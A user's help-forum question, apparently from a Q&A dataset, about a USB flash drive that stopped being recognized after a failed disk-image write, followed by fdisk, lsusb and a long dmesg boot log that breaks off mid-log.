409872	usb memory stick wo n't be recognized as a drive	i have a usb memory stick that used to work perfectly fine , but then i made a mistake while trying to install a disk image onto it and now no computer recognizes that it is a memory drive . it does n't mount , fdisk does n't recognize it . however lsusb recognizes it . output of fdisk -l disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00013ee7 device boot start end blocks id system /dev/sda1 * 2048 902584319 451291136 83 linux /dev/sda2 1936875518 1953523711 8324097 5 extended partition 2 does not start on physical sector boundary . /dev/sda3 902584320 1936873471 517144576 83 linux /dev/sda5 1936875520 1953523711 8324096 82 linux swap / solaris partition table entries are not in disk order output of lsusb : bus 002 device 002 : id 8087:8000 intel corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:8008 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 005 : id 04b4:0033 cypress semiconductor corp . mouse bus 003 device 004 : id 04d9:1702 holtek semiconductor , inc . bus 003 device 008 : id 13fe:3e00 kingston technology company inc . flash drive bus 003 device 003 : id 147e:1001 upek tcs5b fingerprint sensor bus 003 device 002 : id 041e:3f0e creative technology , ltd bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub it may be important to note that i know that the usb port works , and that the same problem occurs on other computers and other operating systems . dmesg output : [ 0.546360 ] pcieport 0000:00:01.0 : irq 40 for msi/msi-x [ 0.546468 ] pci_hotplug : pci hot plug pci core version : 0.5 [ 0.546475 ] pciehp : pci express hot plug controller driver version : 0.4 [ 0.546501 ] intel_idle : mwait substates : 0x42120 [ 0.546502 ] intel_idle : v0.4 model 0x3c [ 0.546503 ] intel_idle : lapic_timer_reliable_states 0xffffffff [ 0.546567 ] input : power button as /devices/lnxsystm:00/device:00/pnp0c0c:00/input/input0 [ 0.546569 ] acpi : power button [ pwrb ] [ 0.546587 ] input : power button as /devices/lnxsystm:00/lnxpwrbn:00/input/input1 [ 0.546588 ] acpi : power button [ pwrf ] [ 0.546626 ] acpi : fan [ fan0 ] ( off ) [ 0.546638 ] acpi : fan [ fan1 ] ( off ) [ 0.546651 ] acpi : fan [ fan2 ] ( off ) [ 0.546661 ] acpi : fan [ fan3 ] ( off ) [ 0.546673 ] acpi : fan [ fan4 ] ( off ) [ 0.546702 ] acpi : requesting acpi_cpufreq [ 0.547073 ] thermal lnxtherm:00 : registered as thermal_zone0 [ 0.547075 ] acpi : thermal zone [ tz00 ] ( 28 c ) [ 0.547199 ] thermal lnxtherm:01 : registered as thermal_zone1 [ 0.547200 ] acpi : thermal zone [ tz01 ] ( 30 c ) [ 0.547212 ] ghes : hest is not enabled ! [ 0.547251 ] serial : 8250/16550 driver , 32 ports , irq sharing enabled [ 0.567645 ] 00:0a : ttys0 at i/o 0x3f8 ( irq = 4 ) is a 16550a [ 0.568407 ] linux agpgart interface v0.103 [ 0.569075 ] brd : module loaded [ 0.569408 ] loop : module loaded [ 0.569577 ] libphy : fixed mdio bus : probed [ 0.569616 ] tun : universal tun/tap device driver , 1.6 [ 0.569617 ] tun : ( c ) 1999-2004 max krasnyansky [ 0.569638 ] ppp generic driver version 2.4.2 [ 0.569659 ] ehci_hcd : usb 2.0 'enhanced ' host controller ( ehci ) driver [ 0.569660 ] ehci-pci : ehci pci platform driver [ 0.569717 ] ehci-pci 0000:00:1a.0 : setting latency timer to 64 [ 0.569722 ] ehci-pci 0000:00:1a.0 : ehci host controller [ 0.569726 ] ehci-pci 0000:00:1a.0 : new usb bus registered , assigned bus number 1 [ 0.569735 ] ehci-pci 0000:00:1a.0 : debug port 2 [ 0.573619 ] ehci-pci 0000:00:1a.0 : cache line size of 64 is not supported [ 0.573631 ] ehci-pci 0000:00:1a.0 : irq 20 , io mem 0xf7318000 [ 0.583807 ] ehci-pci 0000:00:1a.0 : usb 2.0 started , ehci 1.00 [ 0.583817 ] usb usb1 : new usb device found , idvendor=1d6b , idproduct=0002 [ 0.583818 ] usb usb1 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 0.583819 ] usb usb1 : product : ehci host controller [ 0.583820 ] usb usb1 : manufacturer : linux 3.11.0-14-generic ehci_hcd [ 0.583820 ] usb usb1 : serialnumber : 0000:00:1a.0 [ 0.583870 ] hub 1-0:1.0 : usb hub found [ 0.583874 ] hub 1-0:1.0 : 2 ports detected [ 0.583972 ] ehci-pci 0000:00:1d.0 : setting latency timer to 64 [ 0.583976 ] ehci-pci 0000:00:1d.0 : ehci host controller [ 0.583980 ] ehci-pci 0000:00:1d.0 : new usb bus registered , assigned bus number 2 [ 0.583988 ] ehci-pci 0000:00:1d.0 : debug port 2 [ 0.587891 ] ehci-pci 0000:00:1d.0 : cache line size of 64 is not supported [ 0.587900 ] ehci-pci 0000:00:1d.0 : irq 23 , io mem 0xf7317000 [ 0.599832 ] ehci-pci 0000:00:1d.0 : usb 2.0 started , ehci 1.00 [ 0.599838 ] usb usb2 : new usb device found , idvendor=1d6b , idproduct=0002 [ 0.599839 ] usb usb2 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 0.599839 ] usb usb2 : product : ehci host controller [ 0.599840 ] usb usb2 : manufacturer : linux 3.11.0-14-generic ehci_hcd [ 0.599841 ] usb usb2 : serialnumber : 0000:00:1d.0 [ 0.599886 ] hub 2-0:1.0 : usb hub found [ 0.599888 ] hub 2-0:1.0 : 2 ports detected [ 0.599937 ] ehci-platform : ehci generic platform driver [ 0.599941 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 0.599942 ] ohci-platform : ohci generic platform driver [ 0.599944 ] uhci_hcd : usb universal host controller interface driver [ 0.599999 ] xhci_hcd 0000:00:14.0 : setting latency timer to 64 [ 0.600001 ] xhci_hcd 0000:00:14.0 : xhci host controller [ 0.600005 ] xhci_hcd 0000:00:14.0 : new usb bus registered , assigned bus number 3 [ 0.600071 ] xhci_hcd 0000:00:14.0 : cache line size of 64 is not supported [ 0.600085 ] xhci_hcd 0000:00:14.0 : irq 41 for msi/msi-x [ 0.600114 ] usb usb3 : new usb device found , idvendor=1d6b , idproduct=0002 [ 0.600115 ] usb usb3 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 0.600116 ] usb usb3 : product : xhci host controller [ 0.600117 ] usb usb3 : manufacturer : linux 3.11.0-14-generic xhci_hcd [ 0.600118 ] usb usb3 : serialnumber : 0000:00:14.0 [ 0.600151 ] xhci xhci_add_endpoint called for root hub [ 0.600152 ] xhci xhci_check_bandwidth called for root hub [ 0.600164 ] hub 3-0:1.0 : usb hub found [ 0.600173 ] hub 3-0:1.0 : 14 ports detected [ 0.601512 ] xhci_hcd 0000:00:14.0 : xhci host controller [ 0.601516 ] xhci_hcd 0000:00:14.0 : new usb bus registered , assigned bus number 4 [ 0.601526 ] usb usb4 : new usb device found , idvendor=1d6b , idproduct=0003 [ 0.601527 ] usb usb4 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 0.601528 ] usb usb4 : product : xhci host controller [ 0.601529 ] usb usb4 : manufacturer : linux 3.11.0-14-generic xhci_hcd [ 0.601530 ] usb usb4 : serialnumber : 0000:00:14.0 [ 0.601565 ] xhci xhci_add_endpoint called for root hub [ 0.601565 ] xhci xhci_check_bandwidth called for root hub [ 0.601576 ] hub 4-0:1.0 : usb hub found [ 0.601581 ] hub 4-0:1.0 : 6 ports detected [ 0.607869 ] i8042 : pnp : no ps/2 controller found . probing ports directly . [ 0.610231 ] serio : i8042 kbd port at 0x60,0x64 irq 1 [ 0.610234 ] serio : i8042 aux port at 0x60,0x64 irq 12 [ 0.610287 ] mousedev : ps/2 mouse device common for all mice [ 0.610355 ] rtc_cmos 00:06 : rtc can wake from s4 [ 0.610454 ] rtc_cmos 00:06 : rtc core : registered rtc_cmos as rtc0 [ 0.610476 ] rtc_cmos 00:06 : alarms up to one month , y3k , 242 bytes nvram , hpet irqs [ 0.610511 ] device-mapper : uevent : version 1.0.3 [ 0.610543 ] device-mapper : ioctl : 4.25.0-ioctl ( 2013-06-26 ) initialised : dm-devel @ redhat.com [ 0.610633 ] cpuidle : using governor ladder [ 0.610753 ] cpuidle : using governor menu [ 0.610758 ] ledtrig-cpu : registered to indicate activity on cpus [ 0.610814 ] tcp : cubic registered [ 0.610860 ] net : registered protocol family 10 [ 0.610958 ] net : registered protocol family 17 [ 0.610965 ] key type dns_resolver registered [ 0.611117 ] pm : hibernation image not present or could not be loaded . [ 0.611119 ] loading module verification certificates [ 0.611615 ] modsign : loaded cert 'magrathea : glacier signing key : 4f57df1a3429640d83ffde722907e1377213486f' [ 0.611620 ] registered taskstats version 1 [ 0.612807 ] key type trusted registered [ 0.613777 ] key type encrypted registered [ 0.614779 ] apparmor : apparmor sha1 policy hashing enabled [ 0.615110 ] magic number : 14:18:6 [ 0.615145 ] memory memory50 : hash matches [ 0.615192 ] rtc_cmos 00:06 : setting system clock to 2014-01-25 02:02:05 utc ( 1390615325 ) [ 0.616075 ] bios edd facility v0.16 2004-jun-25 , 0 devices found [ 0.616076 ] edd information not available . [ 0.616673 ] freeing unused kernel memory : 1364k ( ffffffff81d10000 - ffffffff81e65000 ) [ 0.616674 ] write protecting the kernel read-only data : 12288k [ 0.618093 ] freeing unused kernel memory : 1036k ( ffff8800016fd000 - ffff880001800000 ) [ 0.619120 ] freeing unused kernel memory : 836k ( ffff880001b2f000 - ffff880001c00000 ) [ 0.626651 ] systemd-udevd [ 145 ] : starting version 204 [ 0.633032 ] video : module verification failed : signature and/or required key missing - tainting kernel [ 0.637120 ] ahci 0000:00:1f.2 : version 3.0 [ 0.637221 ] ahci 0000:00:1f.2 : irq 42 for msi/msi-x [ 0.637257 ] ahci 0000:00:1f.2 : ahci 0001.0300 32 slots 6 ports 6 gbps 0x3 impl sata mode [ 0.637259 ] ahci 0000:00:1f.2 : flags : 64bit ncq led clo pio slum part ems apst [ 0.637261 ] ahci 0000:00:1f.2 : setting latency timer to 64 [ 0.641442 ] r8169 gigabit ethernet driver 2.3lk-napi loaded [ 0.641451 ] r8169 0000:03:00.0 : ca n't disable aspm ; os does n't have aspm control [ 0.644381 ] scsi0 : ahci [ 0.644447 ] scsi1 : ahci [ 0.644500 ] scsi2 : ahci [ 0.644551 ] scsi3 : ahci [ 0.644596 ] scsi4 : ahci [ 0.644641 ] scsi5 : ahci [ 0.644725 ] ata1 : sata max udma/133 abar m2048 @ 0xf7316000 port 0xf7316100 irq 42 [ 0.644727 ] ata2 : sata max udma/133 abar m2048 @ 0xf7316000 port 0xf7316180 irq 42 [ 0.644729 ] ata3 : dummy [ 0.644729 ] ata4 : dummy [ 0.644730 ] ata5 : dummy [ 0.644731 ] ata6 : dummy [ 0.648276 ] r8169 0000:03:00.0 : irq 43 for msi/msi-x [ 0.648386 ] r8169 0000:03:00.0 eth0 : rtl8168g/8111g at 0xffffc90000c38000 , ac:22:0b:79 : d9:19 , xid 0c000800 irq 43 [ 0.648387 ] r8169 0000:03:00.0 eth0 : jumbo features [ frames : 9200 bytes , tx checksumming : ko ] [ 0.896284 ] usb 1-1 : new high-speed usb device number 2 using ehci-pci [ 0.964389 ] ata1 : sata link up 6.0 gbps ( sstatus 133 scontrol 300 ) [ 0.964403 ] ata2 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 0.965516 ] ata1.00 : ata-9 : st1000dm003-1ch162 , cc47 , max udma/133 [ 0.965518 ] ata1.00 : 1953525168 sectors , multi 16 : lba48 ncq ( depth 31/32 ) , aa [ 0.966108 ] ata2.00 : atapi : asus drw-24f1st a , 1.00 , max udma/100 [ 0.966378 ] ata1.00 : configured for udma/133 [ 0.966494 ] scsi 0:0:0:0 : direct-access ata st1000dm003-1ch1 cc47 pq : 0 ansi : 5 [ 0.966580 ] sd 0:0:0:0 : [ sda ] 1953525168 512-byte logical blocks : ( 1.00 tb/931 gib ) [ 0.966582 ] sd 0:0:0:0 : [ sda ] 4096-byte physical blocks [ 0.966595 ] sd 0:0:0:0 : [ sda ] write protect is off [ 0.966596 ] sd 0:0:0:0 : [ sda ] mode sense : 00 3a 00 00 [ 0.966602 ] sd 0:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 0.966603 ] sd 0:0:0:0 : attached scsi generic sg0 type 0 [ 0.967087 ] ata2.00 : configured for udma/100 [ 0.968331 ] scsi 1:0:0:0 : cd-rom asus drw-24f1st a 1.00 pq : 0 ansi : 5 [ 0.972004 ] sr0 : scsi3-mmc drive : 40x/40x writer dvd-ram cd/rw xa/form2 cdda tray [ 0.972006 ] cdrom : uniform cd-rom driver revision : 3.20 [ 0.972091 ] sr 1:0:0:0 : attached scsi cd-rom sr0 [ 0.972129 ] sr 1:0:0:0 : attached scsi generic sg1 type 5 [ 1.015236 ] sda : sda1 sda2 < sda5 > sda3 [ 1.015464 ] sd 0:0:0:0 : [ sda ] attached scsi disk [ 1.032855 ] usb 1-1 : new usb device found , idvendor=8087 , idproduct=8008 [ 1.032857 ] usb 1-1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 1.032989 ] hub 1-1:1.0 : usb hub found [ 1.033095 ] hub 1-1:1.0 : 6 ports detected [ 1.144640 ] usb 2-1 : new high-speed usb device number 2 using ehci-pci [ 1.277208 ] usb 2-1 : new usb device found , idvendor=8087 , idproduct=8000 [ 1.277210 ] usb 2-1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 1.277349 ] hub 2-1:1.0 : usb hub found [ 1.277450 ] hub 2-1:1.0 : 8 ports detected [ 1.445069 ] usb 3-1 : new full-speed usb device number 2 using xhci_hcd [ 1.462463 ] usb 3-1 : new usb device found , idvendor=041e , idproduct=3f0e [ 1.462465 ] usb 3-1 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 1.462466 ] usb 3-1 : product : e-mu xmidi1x1 tab [ 1.462467 ] usb 3-1 : manufacturer : e-mu systems , inc . [ 1.462468 ] usb 3-1 : serialnumber : e-mu-e6-3f0e-07d90a1e-1014a-tab [ 1.529207 ] tsc : refined tsc clocksource calibration : 3499.997 mhz [ 1.629355 ] usb 3-10 : new full-speed usb device number 3 using xhci_hcd [ 1.646037 ] usb 3-10 : new usb device found , idvendor=147e , idproduct=1001 [ 1.646038 ] usb 3-10 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 1.646040 ] usb 3-10 : product : fingerprint sensor [ 1.646041 ] usb 3-10 : manufacturer : touchstrip [ 1.646090 ] usb 3-10 : ep 0x83 - rounding interval to 64 microframes , ep desc says 80 microframes [ 1.813622 ] usb 3-13 : new low-speed usb device number 4 using xhci_hcd [ 1.849713 ] usb 3-13 : new usb device found , idvendor=04d9 , idproduct=1702 [ 1.849715 ] usb 3-13 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 1.849716 ] usb 3-13 : product : usb keyboard [ 1.849717 ] usb 3-13 : manufacturer : [ 1.849779 ] usb 3-13 : ep 0x81 - rounding interval to 64 microframes , ep desc says 80 microframes [ 1.849781 ] usb 3-13 : ep 0x82 - rounding interval to 64 microframes , ep desc says 80 microframes [ 1.852444 ] hidraw : raw hid events driver ( c ) jiri kosina [ 1.876577 ] usbcore : registered new interface driver usbhid [ 1.876578 ] usbhid : usb hid core driver [ 1.877465 ] input : usb keyboard as /devices/pci0000:00/0000:00:14.0/usb3/3-13/3-13:1.0/input/input2 [ 1.877509 ] hid-generic 0003:04d9:1702.0001 : input , hidraw0 : usb hid v1.10 keyboard [ usb keyboard ] on usb-0000:00:14.0-13/input0 [ 1.880767 ] input : usb keyboard as /devices/pci0000:00/0000:00:14.0/usb3/3-13/3-13:1.1/input/input3 [ 1.880805 ] hid-generic 0003:04d9:1702.0002 : input , hidraw1 : usb hid v1.10 device [ usb keyboard ] on usb-0000:00:14.0-13/input1 [ 2.017935 ] usb 3-14 : new low-speed usb device number 5 using xhci_hcd [ 2.038985 ] usb 3-14 : new usb device found , idvendor=04b4 , idproduct=0033 [ 2.038987 ] usb 3-14 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 2.039050 ] usb 3-14 : ep 0x81 - rounding interval to 64 microframes , ep desc says 80 microframes [ 2.043137 ] input : hid 04b4:0033 as /devices/pci0000:00/0000:00:14.0/usb3/3-14/3-14:1.0/input/input4 [ 2.043274 ] hid-generic 0003:04b4:0033.0003 : input , hidraw2 : usb hid v1.00 mouse [ hid 04b4:0033 ] on usb-0000:00:14.0-14/input0 [ 2.530776 ] switched to clocksource tsc [ 3.165517 ] xor : automatically using best checksumming function : [ 3.203631 ] avx : 37158.000 mb/sec [ 3.204642 ] device-mapper : dm-raid45 : initialized v0.2594b [ 3.363865 ] raid6 : sse2x1 11976 mb/s [ 3.431967 ] raid6 : sse2x2 15095 mb/s [ 3.500066 ] raid6 : sse2x4 17415 mb/s [ 3.568163 ] raid6 : avx2x1 23122 mb/s [ 3.636263 ] raid6 : avx2x2 26820 mb/s [ 3.704362 ] raid6 : avx2x4 31307 mb/s [ 3.704363 ] raid6 : using algorithm avx2x4 ( 31307 mb/s ) [ 3.704364 ] raid6 : using avx2x2 recovery algorithm [ 3.706059 ] bio : create slab at 1 [ 3.706158 ] btrfs loaded [ 3.842959 ] sr 1:0:0:0 : [ sr0 ] [ 3.842961 ] result : hostbyte=did_ok driverbyte=driver_sense [ 3.842962 ] sr 1:0:0:0 : [ sr0 ] [ 3.842963 ] sense key : illegal request [ current ] [ 3.842964 ] sr 1:0:0:0 : [ sr0 ] [ 3.842966 ] add . sense : illegal mode for this track [ 3.842967 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 3.842968 ] read ( 10 ) : 28 00 00 00 00 20 00 00 02 00 [ 3.842972 ] end_request : i/o error , dev sr0 , sector 128 [ 3.842973 ] buffer i/o error on device sr0 , logical block 16 [ 3.843741 ] sr 1:0:0:0 : [ sr0 ] [ 3.843743 ] result : hostbyte=did_ok driverbyte=driver_sense [ 3.843744 ] sr 1:0:0:0 : [ sr0 ] [ 3.843745 ] sense key : illegal request [ current ] [ 3.843746 ] sr 1:0:0:0 : [ sr0 ] [ 3.843747 ] add . sense : illegal mode for this track [ 3.843748 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 3.843749 ] read ( 10 ) : 28 00 00 00 00 20 00 00 02 00 [ 3.843752 ] end_request : i/o error , dev sr0 , sector 128 [ 3.843753 ] buffer i/o error on device sr0 , logical block 16 [ 3.844525 ] sr 1:0:0:0 : [ sr0 ] [ 3.844526 ] result : hostbyte=did_ok driverbyte=driver_sense [ 3.844527 ] sr 1:0:0:0 : [ sr0 ] [ 3.844528 ] sense key : illegal request [ current ] [ 3.844529 ] sr 1:0:0:0 : [ sr0 ] [ 3.844531 ] add . sense : illegal mode for this track [ 3.844531 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 3.844532 ] read ( 10 ) : 28 00 00 00 80 00 00 00 02 00 [ 3.844535 ] end_request : i/o error , dev sr0 , sector 131072 [ 3.844537 ] buffer i/o error on device sr0 , logical block 16384 [ 3.845308 ] sr 1:0:0:0 : [ sr0 ] [ 3.845309 ] result : hostbyte=did_ok driverbyte=driver_sense [ 3.845310 ] sr 1:0:0:0 : [ sr0 ] [ 3.845311 ] sense key : illegal request [ current ] [ 3.845312 ] sr 1:0:0:0 : [ sr0 ] [ 3.845314 ] add . sense : illegal mode for this track [ 3.845315 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 3.845315 ] read ( 10 ) : 28 00 00 00 80 00 00 00 02 00 [ 3.845319 ] end_request : i/o error , dev sr0 , sector 131072 [ 3.845320 ] buffer i/o error on device sr0 , logical block 16384 [ 3.904478 ] ext4-fs ( sda1 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 13.680881 ] adding 8324092k swap on /dev/sda5 . priority : -1 extents:1 across:8324092k fs [ 13.754619 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 13.789615 ] systemd-udevd [ 448 ] : starting version 204 [ 13.863561 ] wmi : mapper loaded [ 13.863843 ] lp : driver loaded but no devices found [ 13.876759 ] mei_me 0000:00:16.0 : setting latency timer to 64 [ 13.876782 ] mei_me 0000:00:16.0 : irq 44 for msi/msi-x [ 13.879090 ] [ drm ] initialized drm 1.1.0 20060810 [ 13.883381 ] nvidia : module license 'nvidia ' taints kernel . [ 13.883384 ] disabling lock debugging due to kernel taint [ 13.887275 ] usbcore : registered new interface driver snd-usb-audio [ 13.888412 ] snd_hda_intel 0000:00:1b.0 : irq 45 for msi/msi-x [ 13.888476 ] vgaarb : device changed decodes : pci:0000:01:00.0 , olddecodes=io+mem , decodes=none : owns=io+mem [ 13.888610 ] [ drm ] initialized nvidia-drm 0.0.0 20130102 for 0000:01:00.0 on minor 0 [ 13.888615 ] nvrm : loading nvidia unix x86_64 kernel module 319.32 wed jun 19 15:51:20 pdt 2013 [ 13.896796 ] cfg80211 : calling crda to update world regulatory domain [ 13.899239 ] microcode : cpu0 sig=0x306c3 , pf=0x2 , revision=0x9 [ 13.903847 ] sku : nid=0x1d sku_cfg=0x4047e629 [ 13.903849 ] sku : port_connectivity=0x1 [ 13.903850 ] sku : enable_pcbeep=0x0 [ 13.903851 ] sku : check_sum=0x00000007 [ 13.903852 ] sku : customization=0x000000e6 [ 13.903853 ] sku : external_amp=0x5 [ 13.903854 ] sku : platform_type=0x0 [ 13.903855 ] sku : swap=0x0 [ 13.903855 ] sku : override=0x1 [ 13.904301 ] autoconfig : line_outs=4 ( 0x14/0x15/0x16/0x17/0x0 ) type : line [ 13.904302 ] speaker_outs=0 ( 0x0/0x0/0x0/0x0/0x0 ) [ 13.904304 ] hp_outs=1 ( 0x1b/0x0/0x0/0x0/0x0 ) [ 13.904305 ] mono : mono_out=0x0 [ 13.904306 ] dig-out=0x11/0x1e [ 13.904306 ] inputs : [ 13.904308 ] front mic=0x19 [ 13.904309 ] rear mic=0x18 [ 13.904310 ] line=0x1a [ 13.904311 ] realtek : no valid ssid , checking pincfg 0x4047e629 for nid 0x1d [ 13.904313 ] realtek : enabling init asm_id=0xe629 codec_id=10ec0892 [ 13.910089 ] device-mapper : multipath : version 1.5.1 loaded [ 13.916034 ] input : hda intel pch front headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input5 [ 13.916092 ] input : hda intel pch line out side as /devices/pci0000:00/0000:00:1b.0/sound/card0/input6 [ 13.916136 ] input : hda intel pch line out clfe as /devices/pci0000:00/0000:00:1b.0/sound/card0/input7 [ 13.916177 ] input : hda intel pch line out surround as /devices/pci0000:00/0000:00:1b.0/sound/card0/input8 [ 13.916217 ] input : hda intel pch line out front as /devices/pci0000:00/0000:00:1b.0/sound/card0/input9 [ 13.916258 ] input : hda intel pch line as /devices/pci0000:00/0000:00:1b.0/sound/card0/input10 [ 13.916300 ] input : hda intel pch rear mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input11 [ 13.916339 ] input : hda intel pch front mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input12 [ 13.916534 ] acpi warning : 0x0000000000001828-0x000000000000182f systemio conflicts with region \pmio 1 ( 20130517/utaddress-251 ) [ 13.916541 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 13.916543 ] acpi warning : 0x0000000000001c30-0x0000000000001c3f systemio conflicts with region \gprl 1 ( 20130517/utaddress-251 ) [ 13.916545 ] acpi warning : 0x0000000000001c30-0x0000000000001c3f systemio conflicts with region \gpr_ 2 ( 20130517/utaddress-251 ) [ 13.916547 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 13.916553 ] acpi warning : 0x0000000000001c00-0x0000000000001c2f systemio conflicts with region \gprl 1 ( 20130517/utaddress-251 ) [ 13.916556 ] acpi warning : 0x0000000000001c00-0x0000000000001c2f systemio conflicts with region \gpr_ 2 ( 20130517/utaddress-251 ) [ 13.916559 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 13.916560 ] lpc_ich : resource conflict ( s ) found affecting gpio_ich [ 13.916571 ] hda_intel : disabling msi [ 13.916577 ] hda-intel 0000:01:00.1 : handle vga-switcheroo audio client [ 13.916606 ] hda-intel 0000:01:00.1 : disabling 64bit dma [ 13.918898 ] ath : eeprom regdomain : 0x21 [ 13.918900 ] ath : eeprom indicates we should expect a direct regpair map [ 13.918901 ] ath : country alpha2 being used : au [ 13.918901 ] ath : regpair used : 0x21 [ 13.919872 ] hda-intel 0000:01:00.1 : enable delay in rirb handling [ 13.920705 ] ieee80211 phy0 : selected rate control algorithm 'minstrel_ht' [ 13.920878 ] ieee80211 phy0 : atheros ar9485 rev:1 mem=0xffffc90005300000 , irq=19 [ 13.982288 ] asus_wmi : asus wmi generic driver loaded [ 13.983091 ] asus_wmi : initialization : 0x0 [ 13.983103 ] asus_wmi : bios wmi version : 0.9 [ 13.983123 ] asus_wmi : sfun value : 0x0 [ 13.983288 ] input : eee pc wmi hotkeys as /devices/platform/eeepc-wmi/input/input13 [ 13.983711 ] asus_wmi : disabling acpi video driver [ 13.988774 ] microcode : cpu1 sig=0x306c3 , pf=0x2 , revision=0x9 [ 13.989081 ] microcode : cpu2 sig=0x306c3 , pf=0x2 , revision=0x9 [ 13.989386 ] microcode : cpu3 sig=0x306c3 , pf=0x2 , revision=0x9 [ 13.989683 ] microcode : cpu4 sig=0x306c3 , pf=0x2 , revision=0x9 [ 13.989955 ] microcode : cpu5 sig=0x306c3 , pf=0x2 , revision=0x9 [ 13.990228 ] microcode : cpu6 sig=0x306c3 , pf=0x2 , revision=0x9 [ 13.990506 ] microcode : cpu7 sig=0x306c3 , pf=0x2 , revision=0x9 [ 13.990795 ] microcode : microcode update driver : v2.00 , peter oruba [ 13.994891 ] kvm : disabled by bios [ 14.011907 ] kvm : disabled by bios [ 14.036106 ] cfg80211 : world regulatory domain updated : [ 14.036108 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 14.036109 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 14.036110 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 14.036111 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 14.036111 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 14.036112 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 14.036117 ] cfg80211 : calling crda for country : au [ 14.037374 ] cfg80211 : regulatory domain changed to country : au [ 14.037376 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 14.037377 ] cfg80211 : ( 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 14.037378 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2300 mbm ) [ 14.037378 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2300 mbm ) [ 14.037379 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 14.356003 ] input : hda nvidia hdmi/dp , pcm=8 as /devices/pci0000:00/0000:00:01.0/0000:01:00.1/sound/card2/input14 [ 14.356068 ] input : hda nvidia hdmi/dp , pcm=7 as /devices/pci0000:00/0000:00:01.0/0000:01:00.1/sound/card2/input15 [ 14.356127 ] input : hda nvidia hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:01.0/0000:01:00.1/sound/card2/input16 [ 14.850254 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro [ 15.247898 ] init : failsafe main process ( 773 ) killed by term signal [ 15.362106 ] bluetooth : core ver 2.16 [ 15.362117 ] net : registered protocol family 31 [ 15.362118 ] bluetooth : hci device and connection manager initialized [ 15.362124 ] bluetooth : hci socket layer initialized [ 15.362125 ] bluetooth : l2cap socket layer initialized [ 15.362130 ] bluetooth : sco socket layer initialized [ 15.363584 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 15.363586 ] bluetooth : bnep filters : protocol multicast [ 15.363589 ] bluetooth : bnep socket layer initialized [ 15.363979 ] bluetooth : rfcomm tty layer initialized [ 15.363983 ] bluetooth : rfcomm socket layer initialized [ 15.363984 ] bluetooth : rfcomm ver 1.11 [ 15.549198 ] init : avahi-cups-reload main process ( 898 ) terminated with status 1 [ 15.577247 ] ppdev : user-space parallel port driver [ 15.772071 ] r8169 0000:03:00.0 eth0 : link down [ 15.772101 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 15.772226 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 15.783603 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 15.783738 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 15.938641 ] init : udev-fallback-graphics main process ( 935 ) terminated with status 1 [ 16.860093 ] init : plymouth-stop pre-start process ( 1372 ) terminated with status 1 [ 17.448891 ] wlan0 : authenticate with bc:14:01:2a:96 : e8 [ 17.470086 ] wlan0 : send auth to bc:14:01:2a:96 : e8 ( try 1/3 ) [ 17.474272 ] wlan0 : authenticated [ 17.476516 ] wlan0 : associate with bc:14:01:2a:96 : e8 ( try 1/3 ) [ 17.485683 ] wlan0 : rx assocresp from bc:14:01:2a:96 : e8 ( capab=0xc11 status=0 aid=2 ) [ 17.485710 ] wlan0 : associated [ 17.485714 ] 